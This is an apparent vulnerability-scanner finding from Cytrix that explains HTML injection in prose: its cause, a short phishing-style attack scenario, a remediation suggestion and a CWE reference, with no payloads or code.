HTML Injection

Description

During the scan, Cytrix managed to find that an HTML Injection is possible.
This vulnerability occurs when a user’s input is not being correctly validated and the output is not encoded.

A successful HTML Injection will allow the attacker to send malicious HTML pages to a victim.
This could lead to allowing the attacker to change\delete certain things from the site.

A possible attack scenario is demonstrated below :

  1. Attacker discovers injection vulnerability and decides to use an HTML based injection attack.
  2. He then crafts malicious link, including his injected HTML content, and sends it to a user via email.
  3. The user visits the page due to the page being located within a trusted domain.
  4. The attacker’s injected HTML is rendered and presented to the user asking for a username and password.
  5. The user enters a username and password, which are both sent to the attackers server.

Recommendation

Look for HTML elements in the incoming HTTP stream that contains the user’s input.
Simply remove any HTML-syntax sub strings (like tags and links) from any user-supplied text to prevent these situations.

References

https://cwe.mitre.org/data/definitions/80.html